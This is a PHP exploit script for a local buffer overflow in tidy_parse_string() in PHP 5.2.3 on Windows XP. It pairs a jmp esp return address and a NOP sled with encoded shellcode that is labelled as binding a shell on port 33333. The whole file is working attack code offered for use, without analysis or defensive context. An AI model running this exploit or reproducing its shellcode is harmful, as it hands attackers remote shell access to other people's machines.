<?php
//PHP 5.2.3 tidy_parse_string() local buffer overflow exploit (win)

//by GaRY <wofeiwo_at_gmail_dot_com>
//Based on http://www.milw0rm.com/exploits/4080 by rgod
//Just change the shellcode

////Tested on xp Pro sp2 cn

if (!extension_loaded("tidy"))
{
 if(!dl("php_tidy.dll")) die("you need Tidy extension loaded!");
}

$EIP = "\x12\x45\xFA\x7F"; // jmp esp 2k/xp/2003 cn

$NOP = str_repeat("\x90",12);

$shellcode= //bind shell on 33333
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0a".
"\x10\x7a\x0e\x83\xeb\xfc\xe2\xf4\xf6\x7a\x91\x43\xe2\xe9\x85\xf1".
"\xf5\x70\xf1\x62\x2e\x34\xf1\x4b\x36\x9b\x06\x0b\x72\x11\x95\x85".
"\x45\x08\xf1\x51\x2a\x11\x91\x47\x81\x24\xf1\x0f\xe4\x21\xba\x97".
"\xa6\x94\xba\x7a\x0d\xd1\xb0\x03\x0b\xd2\x91\xfa\x31\x44\x5e\x26".
"\x7f\xf5\xf1\x51\x2e\x11\x91\x68\x81\x1c\x31\x85\x55\x0c\x7b\xe5".
"\x09\x3c\xf1\x87\x66\x34\x66\x6f\xc9\x21\xa1\x6a\x81\x53\x4a\x85".
"\x4a\x1c\xf1\x7e\x16\xbd\xf1\x4e\x02\x4e\x12\x80\x44\x1e\x96\x5e".
"\xf5\xc6\x1c\x5d\x6c\x78\x49\x3c\x62\x67\x09\x3c\x55\x44\x85\xde".
"\x62\xdb\x97\xf2\x31\x40\x85\xd8\x55\x99\x9f\x68\x8b\xfd\x72\x0c".
"\x5f\x7a\x78\xf1\xda\x78\xa3\x07\xff\xbd\x2d\xf1\xdc\x43\x29\x5d".
"\x59\x43\x39\x5d\x49\x43\x85\xde\x6c\x78\xf8\x3b\x6c\x43\xf3\xef".
"\x9f\x78\xde\x14\x7a\xd7\x2d\xf1\xdc\x7a\x6a\x5f\x5f\xef\xaa\x66".
"\xae\xbd\x54\xe7\x5d\xef\xac\x5d\x5f\xef\xaa\x66\xef\x59\xfc\x47".
"\x5d\xef\xac\x5e\x5e\x44\x2f\xf1\xda\x83\x12\xe9\x73\xd6\x03\x59".
"\xf5\xc6\x2f\xf1\xda\x76\x10\x6a\x6c\x78\x19\x63\x83\xf5\x10\x5e".
"\x53\x39\xb6\x87\xed\x7a\x3e\x87\xe8\x21\xba\xfd\xa0\xee\x38\x23".
"\xf4\x52\x56\x9d\x87\x6a\x42\xa5\xa1\xbb\x12\x7c\xf4\xa3\x6c\xf1".
"\x7f\x54\x85\xd8\x51\x47\x28\x5f\x5b\x41\x10\x0f\x5b\x41\x2f\x5f".
"\xf5\xc0\x12\xa3\xd3\x15\xb4\x5d\xf5\xc6\x10\xf1\xf5\x27\x85\xde".
"\x81\x47\x86\x8d\xce\x74\x85\xd8\x58\xef\xaa\x66\xe5\xde\x9a\x6e".
"\x59\xef\xac\xf1\xda\x10\x7a\x0e";

$payload = str_repeat("a",2036).$EIP.$NOP.$shellcode;

tidy_parse_string(1,$payload,1);
?>